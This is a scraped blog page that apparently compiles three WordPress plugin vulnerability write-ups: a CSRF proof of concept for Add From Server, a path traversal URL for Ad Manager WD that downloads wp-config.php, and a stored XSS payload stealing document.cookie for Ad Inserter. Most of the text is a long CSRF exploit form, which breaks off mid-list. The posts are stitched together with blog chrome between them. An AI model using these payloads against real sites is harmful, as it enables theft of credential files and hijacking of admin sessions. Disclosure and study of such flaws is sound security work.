Cross-Site Request Forgery vulnerability in Add From Server WordPress Plugin
Abstract
It was discovered that Add From Server is vulnerabile to Cross-Site Request Forgery. It can be exploited by luring the target user into clicking a specially crafted link or visiting a malicious website (or advertisement). An attacker can use this issue to add illegal content to the victims server, or add very large files to the victim's server to exaust the amount of avalible disk space.
Contact
For feedback or questions about this advisory mail us at sumofpwn at securify.nl
The Summer of Pwnage
This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.
OVE ID
OVE-20160718-0004
Tested versions
These issues were successfully tested on Add From Server WordPress Plugin version 6.2.
Fix
This issue is resolved in Add From Server version 3.3.2.
Introduction
The Add From Server WordPress Plugin is a quick plugin, which allows you to import media & files into the WordPress uploads manager from (remote) webservers. It was discovered that Add From Server is vulnerabile to Cross-Site Request Forgery. It can be exploited by luring the target user into clicking a specially crafted link or visiting a malicious website (or advertisement). Because of this,
the following attack scenario's could be possible:
- Adding illegal content to the victim's server.
- Adding very large files to the victim's server to exaust the amount of avalible disk space.
Details
When a (media) file is added from the server, the source is not validated. This means that not only files from the localhost can be added, but also from other sources. The affected code is not protected with an anti-Cross-Site Request Forgery token.
The function handle_imports() only removes slashes. The vulnerability exists in the file add-from-server/class.add-from-server.php (line 213). Because slashes are removed, the file that will be uploaded must exist in the server root. For example: www.example.com/largefile.txt
The host and filename will be set in a separate parameter, so no slashes are needed.
Proof of concept
POST /wp-admin/upload.php?page=add-from-server HTTP/1.1
Host: <target>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
files%5B%5D=largefile.txt&import-date=current&cwd=www.example.com&import=Import
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863147354
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Exploit Title: WordPress Plugin ad manager wd v1.0.11 - Arbitrary File
Download
Google Dork: N/A
Date: 25.01.2019
Vendor Homepage:
https://web-dorado.com/products/wordpress-ad-manager-wd.html
Software: https://wordpress.org/plugins/ad-manager-wd
Version: 1.0.11
Tested on: Win7 x64,
Exploit Author: 41!kh4224rDz
Author Mail : scanweb18@gmail.com
Vulnerability:
wp-content\plugins\ad-manager-wd\wd_ads_admin_class.php
30/ if (isset($_GET['export']) && $_GET['export'] == 'export_csv')
97/ $path = $_GET['path'];
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Transfer-Encoding: binary');
header('Expires: 0');
header('Cache-Control: must-revalidate, post-check=0,
pre-check=0');
header('Pragma: public');
header('Content-Type: text/csv; charset=utf-8');
header('Content-Disposition: attachment; filename=' .
basename($path));
readfile($path);
Arbitrary File Download/Exploit :
http://localhost/wordpress/wp-admin/edit.php?post_type=wd_ads_ads&export=export_csv&path=../wp-config.php
================================================================
CSRF/Stored XSS Vulnerability in Ad Inserter Plugin
================================================================
. contents:: Table Of Content
Overview
========
* Title :CSRF and Stored XSS Vulnerability in Ad Inserter Wordpress Plugin
* Author: Kaustubh G. Padwad
* Plugin Homepage: https://wordpress.org/plugins/ad-inserter/
* Severity: HIGH
* Version Affected: Version 1.5.2 and mostly prior to it
* Version Tested : Version 1.5.2
* version patched:
Description
===========
Vulnerable Parameter
--------------------
* ad1_name
* Block 1
* Block Name
* adinserter name
* disable adinserter
About Vulnerability
-------------------
This plugin is vulnerable to a combination of CSRF/XSS attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), the attacker can insert arbitrary script into admin page. Once exploited, admin's browser can be made to do almost anything the admin user could typically do by hijacking admin's cookies etc.
Vulnerability Class
===================
Cross Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29)
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)
Steps to Reproduce: (POC)
=========================
After installing the plugin
1. Goto Dashboard --> Setting --> Ad Inserter --> Block1
2. Insert this payload ## "> <img src="/" =_=" title="onerror='prompt(document.cookie)'"> ## Into above mention Vulnerable parameter Save settings and see XSS in action
3. Visit Ad Inserter settings page of this plugin anytime later and you can see the script executing as it is stored.
Plugin does not uses any nonces and hence, the same settings can be changed using CSRF attack and the PoC code for the same is below
CSRF POC Code
=============
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="http://127.0.0.1/wp/wp-admin/options-general.php?page=ad-inserter.php" method="POST">
<input type="hidden" name="ad_save" value="Save All Settings" />
<input type="hidden" name="ad1_name" value="<img src="/" =_=" title="onerror='prompt(document.cookie)'">" />
<input type="hidden" name="ad1_process_php" value="0" />
<input type="hidden" name="ad1_data" value="" />
<input type="hidden" name="ad1_displayType" value="None" />
<input type="hidden" name="ad1_display_for_users" value="all" />
<input type="hidden" name="ad1_display_for_devices" value="all" />
<input type="hidden" name="ad1_floatType" value="None" />
<input type="hidden" name="ad1_custom_css" value="" />
<input type="hidden" name="ad1_widget_settings_post" value="0" />
<input type="hidden" name="ad1_widget_settings_post" value="1" />
<input type="hidden" name="ad1_widget_settings_page" value="0" />
<input type="hidden" name="ad1_widget_settings_home" value="0" />
<input type="hidden" name="ad1_widget_settings_home" value="1" />
<input type="hidden" name="ad1_widget_settings_category" value="0" />
<input type="hidden" name="ad1_widget_settings_category" value="1" />
<input type="hidden" name="ad1_widget_settings_search" value="0" />
<input type="hidden" name="ad1_widget_settings_search" value="1" />
<input type="hidden" name="ad1_widget_settings_archive" value="0" />
<input type="hidden" name="ad1_widget_settings_archive" value="1" />
<input type="hidden" name="ad1_after_day" value="0" />
<input type="hidden" name="ad1_general_tag" value="gadgets" />
<input type="hidden" name="ad1_block_user" value="" />
<input type="hidden" name="ad1_domain_list_type" value="Black List" />
<input type="hidden" name="ad1_block_cat" value="" />
<input type="hidden" name="ad1_block_cat_type" value="Black List" />
<input type="hidden" name="ad1_minimum_paragraphs" value="0" />
<input type="hidden" name="ad1_paragraph_text" value="" />
<input type="hidden" name="ad1_paragraphNumber" value="0" />
<input type="hidden" name="ad1_directionType" value="From Top" />
<input type="hidden" name="ad1_excerptNumber" value="0" />
<input type="hidden" name="ad1_enable_manual" value="0" />
<input type="hidden" name="ad1_enable_php_call" value="0" />
<input type="hidden" name="ad2_name" value="Block 2" />
<input type="hidden" name="ad2_process_php" value="0" />
<input type="hidden" name="ad2_data" value="" />
<input type="hidden" name="ad2_displayType" value="None" />
<input type="hidden" name="ad2_display_for_users" value="all" />
<input type="hidden" name="ad2_display_for_devices" value="all" />
<input type="hidden" name="ad2_floatType" value="None" />
<input type="hidden" name="ad2_custom_css" value="" />
<input type="hidden" name="ad2_widget_settings_post" value="0" />
<input type="hidden" name="ad2_widget_settings_post" value="1" />
<input type="hidden" name="ad2_widget_settings_page" value="0" />
<input type="hidden" name="ad2_widget_settings_home" value="0" />
<input type="hidden" name="ad2_widget_settings_home" value="1" />
<input type="hidden" name="ad2_widget_settings_category" value="0" />
<input type="hidden" name="ad2_widget_settings_category" value="1" />
<input type="hidden" name="ad2_widget_settings_search" value="0" />
<input type="hidden" name="ad2_widget_settings_search" value="1" />
<input type="hidden" name="ad2_widget_settings_archive" value="0" />
<input type="hidden" name="ad2_widget_settings_archive" value="1" />
<input type="hidden" name="ad2_after_day" value="0" />
<input type="hidden" name="ad2_general_tag" value="gadgets" />
<input type="hidden" name="ad2_block_user" value="" />
<input type="hidden" name="ad2_domain_list_type" value="Black List" />
<input type="hidden" name="ad2_block_cat" value="" />
<input type="hidden" name="ad2_block_cat_type" value="Black List" />
<input type="hidden" name="ad2_minimum_paragraphs" value="0" />
<input type="hidden" name="ad2_paragraph_text" value="" />
<input type="hidden" name="ad2_paragraphNumber" value="0" />
<input type="hidden" name="ad2_directionType" value="From Top" />
<input type="hidden" name="ad2_excerptNumber" value="0" />
<input type="hidden" name="ad2_enable_manual" value="0" />
<input type="hidden" name="ad2_enable_php_call" value="0" />
<input type="hidden" name="ad3_name" value="Block 3" />
<input type="hidden" name="ad3_process_php" value="0" />
<input type="hidden" name="ad3_data" value="" />
<input type="hidden" name="ad3_displayType" value="None" />
<input type="hidden" name="ad3_display_for_users" value="all" />
<input type="hidden" name="ad3_display_for_devices" value="all" />
<input type="hidden" name="ad3_floatType" value="None" />
<input type="hidden" name="ad3_custom_css" value="" />
<input type="hidden" name="ad3_widget_settings_post" value="0" />
<input type="hidden" name="ad3_widget_settings_post" value="1" />
<input type="hidden" name="ad3_widget_settings_page" value="0" />
<input type="hidden" name="ad3_widget_settings_home" value="0" />
<input type="hidden" name="ad3_widget_settings_home" value="1" />
<input type="hidden" name="ad3_widget_settings_category" value="0" />
<input type="hidden" name="ad3_widget_settings_category" value="1" />
<input type="hidden" name="ad3_widget_settings_search" value="0" />
<input type="hidden" name="ad3_widget_settings_search" value="1" />
<input type="hidden" name="ad3_widget_settings_archive" value="0" />
<input type="hidden" name="ad3_widget_settings_archive" value="1" />
<input type="hidden" name="ad3_after_day" value="0" />
<input type="hidden" name="ad3_general_tag" value="gadgets" />
<input type="hidden" name="ad3_block_user" value="" />
<input type="hidden" name="ad3_domain_list_type" value="Black List" />
<input type="hidden" name="ad3_block_cat" value="" />
<input type="hidden" name="ad3_block_cat_type" value="Black List" />
<input type="hidden" name="ad3_minimum_paragraphs" value="0" />
<input type="hidden" name="ad3_paragraph_text" value="" />
<input type="hidden" name="ad3_paragraphNumber" value="0" />
<input type="hidden" name="ad3_directionType" value="From Top" />
<input type="hidden" name="ad3_excerptNumber" value="0" />
<input type="hidden" name="ad3_enable_manual" value="0" />
<input type="hidden" name="ad3_enable_php_call" value="0" />
<input type="hidden" name="ad4_name" value="Block 4" />
<input type="hidden" name="ad4_process_php" value="0" />
<input type="hidden" name="ad4_data" value="" />
<input type="hidden" name="ad4_displayType" value="None" />
<input type="hidden" name="ad4_display_for_users" value="all" />
<input type="hidden" name="ad4_display_for_devices" value="all" />
<input type="hidden" name="ad4_floatType" value="None" />
<input type="hidden" name="ad4_custom_css" value="" />
<input type="hidden" name="ad4_widget_settings_post" value="0" />
<input type="hidden" name="ad4_widget_settings_post" value="1" />
<input type="hidden" name="ad4_widget_settings_page" value="0" />
<input type="hidden" name="ad4_widget_settings_home" value="0" />
<input type="hidden" name="ad4_widget_settings_home" value="1" />
<input type="hidden" name="ad4_widget_settings_category" value="0" />
<input type="hidden" name="ad4_widget_settings_category" value="1" />
<input type="hidden" name="ad4_widget_settings_search" value="0" />
<input type="hidden" name="ad4_widget_settings_search" value="1" />
<input type="hidden" name="ad4_widget_settings_archive" value="0" />
<input type="hidden" name="ad4_widget_settings_archive" value="1" />
<input type="hidden" name="ad4_after_day" value="0" />
<input type="hidden" name="ad4_general_tag" value="gadgets" />
<input type="hidden" name="ad4_block_user" value="" />
<input type="hidden" name="ad4_domain_list_type" value="Black List" />
<input type="hidden" name="ad4_block_cat" value="" />
<input type="hidden" name="ad4_block_cat_type" value="Black List" />
<input type="hidden" name="ad4_minimum_paragraphs" value="0" />
<input type="hidden" name="ad4_paragraph_text" value="" />
<input type="hidden" name="ad4_paragraphNumber" value="0" />
<input type="hidden" name="ad4_directionType" value="From Top" />
<input type="hidden" name="ad4_excerptNumber" value="0" />
<input type="hidden" name="ad4_enable_manual" value="0" />
<input type="hidden" name="ad4_enable_php_call" value="0" />
<input type="hidden" name="ad5_name" value="Block 5" />
<input type="hidden" name="ad5_process_php" value="0" />
<input type="hidden" name="ad5_data" value="" />
<input type="hidden" name="ad5_displayType" value="None" />
<input type="hidden" name="ad5_display_for_users" value="all" />
<input type="hidden" name="ad5_display_for_devices" value="all" />
<input type="hidden" name="ad5_floatType" value="None" />
<input type="hidden" name="ad5_custom_css" value="" />
<input type="hidden" name="ad5_widget_settings_post" value="0" />
<input type="hidden" name="ad5_widget_settings_post" value="1" />
<input type="hidden" name="ad5_widget_settings_page" value="0" />
<input type="hidden" name="ad5_widget_settings_home" value="0" />
<input type="hidden" name="ad5_widget_settings_home" value="1" />
<input type="hidden" name="ad5_widget_settings_category" value="0" />
<input type="hidden" name="ad5_widget_settings_category" value="1" />
<input type="hidden" name="ad5_widget_settings_search" value="0" />
<input type="hidden" name="ad5_widget_settings_search" value="1" />
<input type="hidden" name="ad5_widget_settings_archive" value="0" />
<input type="hidden" name="ad5_widget_settings_archive" value="1" />
<input type="hidden" name="ad5_after_day" value="0" />
<input type="hidden" name="ad5_general_tag" value="gadgets" />
<input type="hidden" name="ad5_block_user" value="" />
<input type="hidden" name="ad5_domain_list_type" value="Black List" />
<input type="hidden" name="ad5_block_cat" value="" />
<input type="hidden" name="ad5_block_cat_type" value="Black List" />
<input type="hidden" name="ad5_minimum_paragraphs" value="0" />
<input type="hidden" name="ad5_paragraph_text" value="" />
<input type="hidden" name="ad5_paragraphNumber" value="0" />
<input type="hidden" name="ad5_directionType" value="From Top" />
<input type="hidden" name="ad5_excerptNumber" value="0" />
<input type="hidden" name="ad5_enable_manual" value="0" />
<input type="hidden" name="ad5_enable_php_call" value="0" />
<input type="hidden" name="ad6_name" value="Block 6" />
<input type="hidden" name="ad6_process_php" value="0" />
<input type="hidden" name="ad6_data" value="" />
<input type="hidden" name="ad6_displayType" value="None" />
<input type="hidden" name="ad6_display_for_users" value="all" />
<input type="hidden" name="ad6_display_for_devices" value="all" />
<input type="hidden" name="ad6_floatType" value="None" />
<input type="hidden" name="ad6_custom_css" value="" />
<input type="hidden" name="ad6_widget_settings_post" value="0" />
<input type="hidden" name="ad6_widget_settings_post" value="1" />
<input type="hidden" name="ad6_widget_settings_page" value="0" />
<input type="hidden" name="ad6_widget_settings_home" value="0" />
<input type="hidden" name="ad6_widget_settings_home" value="1" />
<input type="hidden" name="ad6_widget_settings_category" value="0" />
<input type="hidden" name="ad6_widget_settings_category" value="1" />
<input type="hidden" name="ad6_widget_settings_search" value="0" />
<input type="hidden" name="ad6_widget_settings_search" value="1" />
<input type="hidden" name="ad6_widget_settings_archive" value="0" />
<input type="hidden" name="ad6_widget_settings_archive" value="1" />
<input type="hidden" name="ad6_after_day" value="0" />
<input type="hidden" name="ad6_general_tag" value="gadgets" />
<input type="hidden" name="ad6_block_user" value="" />
<input type="hidden" name="ad6_domain_list_type" value="Black List" />
<input type="hidden" name="ad6_block_cat" value="" />
<input type="hidden" name="ad6_block_cat_type" value="Black List" />
<input type="hidden" name="ad6_minimum_paragraphs" value="0" />
<input type="hidden" name="ad6_paragraph_text" value="" />
<input type="hidden" name="ad6_paragraphNumber" value="0" />
<input type="hidden" name="ad6_directionType" value="From Top" />
<input type="hidden" name="ad6_excerptNumber" value="0" />
<input type="hidden" name="ad6_enable_manual" value="0" />
<input type="hidden" name="ad6_enable_php_call" value="0" />
<input type="hidden" name="ad7_name" value="Block 7" />
<input type="hidden" name="ad7_process_php" value="0" />
<input type="hidden" name="ad7_data" value="" />
<input type="hidden" name="ad7_displayType" value="None" />
<input type="hidden" name="ad7_display_for_users" value="all" />
<input type="hidden" name="ad7_display_for_devices" value="all" />
<input type="hidden" name="ad7_floatType" value="None" />
<input type="hidden" name="ad7_custom_css" value="" />
<input type="hidden" name="ad7_widget_settings_post" value="0" />
<input type="hidden" name="ad7_widget_settings_post" value="1" />
<input type="hidden" name="ad7_widget_settings_page" value="0" />
<input type="hidden" name="ad7_widget_settings_home" value="0" />
<input type="hidden" name="ad7_widget_settings_home" value="1" />
<input type="hidden" name="ad7_widget_settings_category" value="0" />
<input type="hidden" name="ad7_widget_settings_category" value="1" />
<input type="hidden" name="ad7_widget_settings_search" value="0" />
<input type="hidden" name="ad7_widget_settings_search" value="1" />
<input type="hidden" name="ad7_widget_settings_archive" value="0" />
<input type="hidden" name="ad7_widget_settings_archive" value="1" />
<input type="hidden" name="ad7_after_day" value="0" />
<input type="hidden" name="ad7_general_tag" value="gadgets" />
<input type="hidden" name="ad7_block_user" value="" />
<input type="hidden" name="ad7_domain_list_type" value="Black List" />
<input type="hidden" name="ad7_block_cat" value="" />
<input type="hidden" name="ad7_block_cat_type" value="Black List" />
<input type="hidden" name="ad7_minimum_paragraphs" value="0" />
<input type="hidden" name="ad7_paragraph_text" value="" />
<input type="hidden" name="ad7_paragraphNumber" value="0" />
<input type="hidden" name="ad7_directionType" value="From Top" />
<input type="hidden" name="ad7_excerptNumber" value="0" />
<input type="hidden" name="ad7_enable_manual" value="0" />
<input type="hidden" name="ad7_enable_php_call" value="0" />
<input type="hidden" name="ad8_name" value="Block 8" />
<input type="hidden" name="ad8_process_php" value="0" />
<input type="hidden" name="ad8_data" value="" />
<input type="hidden" name="ad8_displayType" value="None" />
<input type="hidden" name="ad8_display_for_users" value="all" />
<input type="hidden" name="ad8_display_for_devices" value="all" />
<input type="hidden" name="ad8_floatType" value="None" />
<input type="hidden" name="ad8_custom_css" value="" />
<input type="hidden" name="ad8_widget_settings_post" value="0" />
<input type="hidden" name="ad8_widget_settings_post" value="1" />
<input type="hidden" name="ad8_widget_settings_page" value="0" />
<input type="hidden" name="ad8_widget_settings_home" value="0" />
<input type="hidden" name="ad8_widget_settings_home" value="1" />
<input type="hidden" name="ad8_widget_settings_category" value="0" />
<input type="hidden" name="ad8_widget_settings_category" value="1" />
<input type="hidden" name="ad8_widget_settings_search" value="0" />
<input type="hidden" name="ad8_widget_settings_search" value="1" />
<input type="hidden" name="ad8_widget_settings_archive" value="0" />
<input type="hidden" name="ad8_widget_settings_archive" value="1" />
<input type="hidden" name="ad8_after_day" value="0" />
<input type="hidden" name="ad8_general_tag" value="gadgets" />
<input type="hidden" name="ad8_block_user" value="" />
<input type="hidden" name="ad8_domain_list_type" value="Black List" />
<input type="hidden" name="ad8_block_cat" value="" />
<input type="hidden" name="ad8_block_cat_type" value="Black List" />
<input type="hidden" name="ad8_minimum_paragraphs" value="0" />
<input type="hidden" name="ad8_paragraph_text" value="" />
<input type="hidden" name="ad8_paragraphNumber" value="0" />
<input type="hidden" name="ad8_directionType" value="From Top" />
<input type="hidden" name="ad8_excerptNumber" value="0" />
<input type="hidden" name="ad8_enable_manual" value="0" />
<input type="hidden" name="ad8_enable_php_call" value="0" />
<input type="hidden" name="ad9_name" value="Block 9" />
<input type="hidden" name="ad9_process_php" value="0" />
<input type="hidden" name="ad9_data" value="" />
<input type="hidden" name="ad9_displayType" value="None" />
<input type="hidden" name="ad9_display_for_users" value="all" />
<input type="hidden" name="ad9_display_for_devices" value="all" />
<input type="hidden" name="ad9_floatType" value="None" />
<input type="hidden" name="ad9_custom_css" value="" />
<input type="hidden" name="ad9_widget_settings_post" value="0" />
<input type="hidden" name="ad9_widget_settings_post" value="1" />
<input type="hidden" name="ad9_widget_settings_page" value="0" />
<input type="hidden" name="ad9_widget_settings_home" value="0" />
<input type="hidden" name="ad9_widget_settings_home" value="1" />
<input type="hidden" name="ad9_widget_settings_category" value="0" />
<input type="hidden" name="ad9_widget_settings_category" value="1" />
<input type="hidden" name="ad9_widget_settings_search" value="0" />
<input type="hidden" name="ad9_widget_settings_search" value="1" />
<input type="hidden" name="ad9_widget_settings_archive" value="0" />
<input type="hidden" name="ad9_widget_settings_archive" value="1" />
<input type="hidden" name="ad9_after_day" value="0" />
<input type="hidden" name="ad9_general_tag" value="gadgets" />
<input type="hidden" name="ad9_block_user" value="" />
<input type="hidden" name="ad9_domain_list_type" value="Black List" />
<input type="hidden" name="ad9_block_cat" value="" />
<input type="hidden" name="ad9_block_cat_type" value="Black List" />
<input type="hidden" name="ad9_minimum_paragraphs" value="0" />
<input type="hidden" name="ad9_paragraph_text" value="" />
<input type="hidden" name="ad9_paragraphNumber" value="0" />
<input type="hidden" name="ad9_directionType" value="From Top" />
<input type="hidden" name="ad9_excerptNumber" value="0" />
<input type="hidden" name="ad9_enable_manual" value="0" />
<input type="hidden" name="ad9_enable_php_call" value="0" />
<input type="hidden" name="ad10_name" value="Block 10" />
<input type="hidden" name="ad10_process_php" value="0" />
<input type="hidden" name="ad10_data" value="" />
<input type="hidden" name="ad10_displayType" value="None" />
<input type="hidden" name="ad10_display_for_users" value="all" />
<input type="hidden" name="ad10_display_for_devices" value="all" />
<input type="hidden" name="ad10_floatType" value="None" />
<input type="hidden" name="ad10_custom_css" value="" />
<input type="hidden" name="ad10_widget_settings_post" value="0" />
<input type="hidden" name="ad10_widget_settings_post" value="1" />
<input type="hidden" name="ad10_widget_settings_page" value="0" />
<input type="hidden" name="ad10_widget_settings_home" value="0" />
<input type="hidden" name="ad10_widget_settings_home" value="1" />
<input type="hidden" name="ad10_widget_settings_category" value="0" />
<input type="hidden" name="ad10_widget_settings_category" value="1" />
<input type="hidden" name="ad10_widget_settings_search" value="0" />
<input type="hidden" name="ad10_widget_settings_search" value="1" />
<input type="hidden" name="ad10_widget_settings_archive" value="0" />
<input type="hidden" name="ad10_widget_settings_archive" value="1" />
<input type="hidden" name="ad10_after_day" value="0" />
<input type="hidden" name="ad10_general_tag" value="gadgets" />
<input type="hidden" name="ad10_block_user" value="" />
<input type="hidden" name="ad10_domain_list_type" value="Black List" />
<input type="hidden" name="ad10_block_cat" value="" />
<input type="hidden" name="ad10_block_cat_type" value="Black List" />
<input type="hidden" name="ad10_minimum_paragraphs" value="0" />
<input type="hidden" name="ad10_paragraph_text" value="" />
<input type="hidden" name="ad10_paragraphNumber" value="0" />
<input type="hidden" name="ad10_directionType" value="From Top" />
<input type="hidden" name="ad10_excerptNumber" value="0" />
<input type="hidden" name="ad10_enable_manual" value="0" />
<input type="hidden" name="ad10_enable_php_call" value="0" />
<input type="hidden" name="ad11_name" value="Block 11" />
<input type="hidden" name="ad11_process_php" value="0" />
<input type="hidden" name="ad11_data" value="" />
<input type="hidden" name="ad11_displayType" value="None" />
<input type="hidden" name="ad11_display_for_users" value="all" />
<input type="hidden" name="ad11_display_for_devices" value="all" />
<input type="hidden" name="ad11_floatType" value="None" />
<input type="hidden" name="ad11_custom_css" value="" />
<input type="hidden" name="ad11_widget_settings_post" value="0" />
<input type="hidden" name="ad11_widget_settings_post" value="1" />
<input type="hidden" name="ad11_widget_settings_page" value="0" />
<input type="hidden" name="ad11_widget_settings_home" value="0" />
<input type="hidden" name="ad11_widget_settings_home" value="1" />
<input type="hidden" name="ad11_widget_settings_category" value="0" />
<input type="hidden" name="ad11_widget_settings_category" value="1" />
<input type="hidden" name="ad11_widget_settings_search" value="0" />
<input type="hidden" name="ad11_widget_settings_search" value="1" />
<input type="hidden" name="ad11_widget_settings_archive" value="0" />
<input type="hidden" name="ad11_widget_settings_archive" value="1" />
<input type="hidden" name="ad11_after_day" value="0" />
<input type="hidden" name="ad11_general_tag" value="gadgets" />
<input type="hidden" name="ad11_block_user" value="" />
<input type="hidden" name="ad11_domain_list_type" value="Black List" />
<input type="hidden" name="ad11_block_cat" value="" />
<input type="hidden" name="ad11_block_cat_type" value="Black List" />
<input type="hidden" name="ad11_minimum_paragraphs" value="0" />
<input type="hidden" name="ad11_paragraph_text" value="" />
<input type="hidden" name="ad11_paragraphNumber" value="0" />
<input type="hidden" name="ad11_directionType" value="From Top" />
<input type="hidden" name="ad11_excerptNumber" value="0" />
<input type="hidden" name="ad11_enable_manual" value="0" />
<input type="hidden" name="ad11_enable_php_call" value="0" />
<input type="hidden" name="ad12_name" value="Block 12" />
<input type="hidden" name="ad12_process_php" value="0" />
<input type="hidden" name="ad12_data" value="" />
<input type="hidden" name="ad12_displayType" value="None" />
<input type="hidden" name="ad12_display_for_users" value="all" />
<input type="hidden" name="ad12_display_for_devices" value="all" />
<input type="hidden" name="ad12_floatType" value="None" />
<input type="hidden" name="ad12_custom_css" value="" />
<input type="hidden" name="ad12_widget_settings_post" value="0" />
<input type="hidden" name="ad12_widget_settings_post" value="1" />
<input type="hidden" name="ad12_widget_settings_page" value="0" />
<input type="hidden" name="ad12_widget_settings_home" value="0" />
<input type="hidden" name="ad12_widget_settings_home" value="1" />
<input type="hidden" name="ad12_widget_settings_category" value="0" />
<input type="hidden" name="ad12_widget_settings_category" value="1" />
<input type="hidden" name="ad12_widget_settings_search" value="0" />
<input type="hidden" name="ad12_widget_settings_search" value="1" />
<input type="hidden" name="ad12_widget_settings_archive" value="0" />
<input type="hidden" name="ad12_widget_settings_archive" value="1" />
<input type="hidden" name="ad12_after_day" value="0" />
<input type="hidden" name="ad12_general_tag" value="gadgets" />
<input type="hidden" name="ad12_block_user" value="" />
<input type="hidden" name="ad12_domain_list_type" value="Black List" />
<input type="hidden" name="ad12_block_cat" value="" />
<input type="hidden" name="ad12_block_cat_type" value="Black List" />
<input type="hidden" name="ad12_minimum_paragraphs" value="0" />
<input type="hidden" name="ad12_paragraph_text" value="" />
<input type="hidden" name="ad12_paragraphNumber" value="0" />
<input type="hidden" name="ad12_directionType" value="From Top" />
<input type="hidden" name="ad12_excerptNumber" value="0" />
<input type="hidden" name="ad12_enable_manual" value="0" />
<input type="hidden" name="ad12_enable_php_call" value="0" />
<input type="hidden" name="ad13_name" value="Block 13" />
<input type="hidden" name="ad13_process_php" value="0" />
<input type="hidden" name="ad13_data" value="" />
<input type="hidden" name="ad13_displayType" value="None" />
<input type="hidden" name="ad13_display_for_users" value="all" />
<input type="hidden" name="ad13_display_for_devices" value="all" />
<input type="hidden" name="ad13_floatType" value="None" />
<input type="hidden" name="ad13_custom_css" value="" />
<input type="hidden" name="ad13_widget_settings_post" value="0" />
<input type="hidden" name="ad13_widget_settings_post" value="1" />
<input type="hidden" name="ad13_widget_settings_page" value="0" />
<input type="hidden" name="ad13_widget_settings_home" value="0" />
<input type="hidden" name="ad13_widget_settings_home" value="1" />
<input type="hidden" name="ad13_widget_settings_category" value="0" />
<input type="hidden" name="ad13_widget_settings_category" value="1" />
<input type="hidden" name="ad13_widget_settings_search" value="0" />
<input type="hidden" name="ad13_widget_settings_search" value="1" />
<input type="hidden" name="ad13_widget_settings_archive" value="0" />
<input type="hidden" name="ad13_widget_settings_archive" value="1" />
<input type="hidden" name="ad13_after_day" value="0" />
<input type="hidden" name="ad13_general_tag" value="gadgets" />
<input type="hidden" name="ad13_block_user" value="" />
<input type="hidden" name="ad13_domain_list_type" value="Black List" />
<input type="hidden" name="ad13_block_cat" value="" />
<input type="hidden" name="ad13_block_cat_type" value="Black List" />
<input type="hidden" name="ad13_minimum_paragraphs" value="0" />
<input type="hidden" name="ad13_paragraph_text" value="" />
<input type="hidden" name="ad13_paragraphNumber" value="0" />
<input type="hidden" name="ad13_directionType" value="From Top" />
<input type="hidden" name="ad13_excerptNumber" value="0" />
<input type="hidden" name="ad13_enable_manual" value="0" />
<input type="hidden" name="ad13_enable_php_call" value="0" />
<input type="hidden" name="ad14_name" value="Block 14" />
<input type="hidden" name="ad14_process_php" value="0" />
<input type="hidden" name="ad14_data" value="" />
<input type="hidden" name="ad14_displayType" value="None" />
<input type="hidden" name="ad14_display_for_users" value="all" />
<input type="hidden" name="ad14_display_for_devices" value="all" />
<input type="hidden" name="ad14_floatType" value="None" />
<input type="hidden" name="ad14_custom_css" value="" />
<input type="hidden" name="ad14_widget_settings_post" value="0" />
<input type="hidden" name="ad14_widget_settings_post" value="1" />
<input type="hidden" name="ad14_widget_settings_page" value="0" />
<input type="hidden" name="ad14_widget_settings_home" value="0" />
<input type="hidden" name="ad14_widget_settings_home" value="1" />
<input type="hidden" name="ad14_widget_settings_category" value="0" />
<input type="hidden" name="ad14_widget_settings_category" value="1" />
<input type="hidden" name="ad14_widget_settings_search" value="0" />
<input type="hidden" name="ad14_widget_settings_search" value="1" />
<input type="hidden" name="ad14_widget_settings_archive" value="0" />
<input type="hidden" name="ad14_widget_settings_archive" value="1" />
<input type="hidden" name="ad14_after_day" value="0" />
<input type="hidden" name="ad14_general_tag" value="gadgets" />
<input type="hidden" name="ad14_block_user" value="" />
<input type="hidden" name="ad14_domain_list_type" value="Black List" />
<input type="hidden" name="ad14_block_cat" value="" />
<input type="hidden" name="ad14_block_cat_type" value="Black List" />
<input type="hidden" name="ad14_minimum_paragraphs" value="0" />
<input type="hidden" name="ad14_paragraph_text" value="" />
<input type="hidden" name="ad14_paragraphNumber" value="0" />
<input type="hidden" name="ad14_directionType" value="From Top" />
<input type="hidden" name="ad14_excerptNumber" value="0" />
<input type="hidden" name="ad14_enable_manual" value="0" />
<input type="hidden" name="ad14_enable_php_call" value="0" />
<input type="hidden" name="ad15_name" value="Block 15" />
<input type="hidden" name="ad15_process_php" value="0" />
<input type="hidden" name="ad15_data" value="" />
<input type="hidden" name="ad15_displayType" value="None" />
<input type="hidden" name="ad15_display_for_users" value="all" />
<input type="hidden" name="ad15_display_for_devices" value="all" />
<input type="hidden" name="ad15_floatType" value="None" />
<input type="hidden" name="ad15_custom_css" value="" />
<input type="hidden" name="ad15_widget_settings_post" value="0" />
<input type="hidden" name="ad15_widget_settings_post" value="1" />
<input type="hidden" name="ad15_widget_settings_page" value="0" />
<input type="hidden" name="ad15_widget_settings_home" value="0" />
<input type="hidden" name="ad15_widget_settings_home" value="1" />
<input type="hidden" name="ad15_widget_settings_category" value="0" />
<input type="hidden" name="ad15_widget_settings_category" value="1" />
<input type="hidden" name="ad15_widget_settings_search" value="0" />
<input type="hidden" name="ad15_widget_settings_search" value="1" />
<input type="hidden" name="ad15_widget_settings_archive" value="0" />
<input type="hidden" name="ad15_widget_settings_archive" value="1" />
<input type="hidden" name="ad15_after_day" value="0" />
<input type="hidden" name="ad15_general_tag" value="gadgets" />
<input type="hidden" name="ad15_block_user" value="" />
<input type="hidden" name="ad15_domain_list_type" value="Black List" />
